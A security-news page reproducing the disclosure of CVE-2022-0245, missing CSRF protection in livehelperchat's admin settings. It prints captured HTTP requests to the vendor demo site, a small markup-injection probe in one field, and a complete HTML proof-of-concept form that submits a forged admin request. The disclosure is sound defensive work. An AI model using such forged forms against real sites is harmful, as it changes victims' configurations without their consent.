Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0245: Cross-Site Request Forgery (CSRF) in livehelperchat

Cross-Site Request Forgery (CSRF) in GitHub repository livehelperchat/livehelperchat prior to 2.0.

CVE
Open in Source
#csrf#vulnerability#web#windows#git

Description

A CSRF issue is found in the Settings>Live help configuration>Canned Messages. It was found that no CSRF token validation is getting done as no CSRF token is getting passed with the request. Also while generating statistics, the action is done through GET method with no CSRF token.

Two more instances were found where CSRF token validation is not being done, one in Notification settings under Settings>Live help configuration>Notification settings and the other in group chat options under Settings>Live help configuration>Group chat option.

Proof of Concept****Request for canned messages

POST /site_admin/chat/newcannedmsg HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 526
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/newcannedmsg
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=5j5o8v6g4ut9ci9bsc07kuco6f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Title=abcd&Tags=abcd&ExplainHover=&Delay=0&Position=0&cannedDepartmentGroup=0&Message=&FallbackMessage=&HTMLSnippet=&MessageExtFB=&FallbackMessageExtFB=&repetitiveness=0&active_from=2022-01-13T11%3A41&active_to=2022-01-13T11%3A41&modStartTime=00%3A00&modEndTime=00%3A00&tudStartTime=00%3A00&tudEndTime=00%3A00&wedStartTime=00%3A00&wedEndTime=00%3A00&thdStartTime=00%3A00&thdEndTime=00%3A00&frdStartTime=00%3A00&frdEndTime=00%3A00&sadStartTime=00%3A00&sadEndTime=00%3A00&sudStartTime=00%3A00&sudEndTime=00%3A00&Save_action=Save

You can see that NO CSRF token is getting sent along with the request.

Another request to generate statistics is done using the GET method.

GET /site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Request notification settings where CSRF token validation is not being done.

POST /site_admin/notifications/settings HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/notifications/settings
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&enabled=on&subject=&http_host=demo.livehelperchat.com&icon=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&badge=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&vibrate=&public_key=%22%3E%3Cabcdddd&private_key=%22%3E%3Cabbbcd&StoreOptions=Save

Request group chat options where CSRF token validation not done

POST /site_admin/groupchat/options HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/groupchat/options
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&supervisor=3&StoreOptions=Save

Below is an example POC to exploit the above issues.****CSRF POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.livehelperchat.com/site_admin/chat/newcannedmsg" method="POST">
      <input type="hidden" name="Title" value="abcd" />
      <input type="hidden" name="Tags" value="abcd" />
      <input type="hidden" name="ExplainHover" value="" />
      <input type="hidden" name="Delay" value="0" />
      <input type="hidden" name="Position" value="0" />
      <input type="hidden" name="cannedDepartmentGroup" value="0" />
      <input type="hidden" name="Message" value="" />
      <input type="hidden" name="FallbackMessage" value="" />
      <input type="hidden" name="HTMLSnippet" value="" />
      <input type="hidden" name="MessageExtFB" value="" />
      <input type="hidden" name="FallbackMessageExtFB" value="" />
      <input type="hidden" name="repetitiveness" value="0" />
      <input type="hidden" name="active&#95;from" value="2022&#45;01&#45;13T11&#58;41" />
      <input type="hidden" name="active&#95;to" value="2022&#45;01&#45;13T11&#58;41" />
      <input type="hidden" name="modStartTime" value="00&#58;00" />
      <input type="hidden" name="modEndTime" value="00&#58;00" />
      <input type="hidden" name="tudStartTime" value="00&#58;00" />
      <input type="hidden" name="tudEndTime" value="00&#58;00" />
      <input type="hidden" name="wedStartTime" value="00&#58;00" />
      <input type="hidden" name="wedEndTime" value="00&#58;00" />
      <input type="hidden" name="thdStartTime" value="00&#58;00" />
      <input type="hidden" name="thdEndTime" value="00&#58;00" />
      <input type="hidden" name="frdStartTime" value="00&#58;00" />
      <input type="hidden" name="frdEndTime" value="00&#58;00" />
      <input type="hidden" name="sadStartTime" value="00&#58;00" />
      <input type="hidden" name="sadEndTime" value="00&#58;00" />
      <input type="hidden" name="sudStartTime" value="00&#58;00" />
      <input type="hidden" name="sudEndTime" value="00&#58;00" />
      <input type="hidden" name="Save&#95;action" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability can help an attacker to create canned messages, change notification settings and group chat options.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE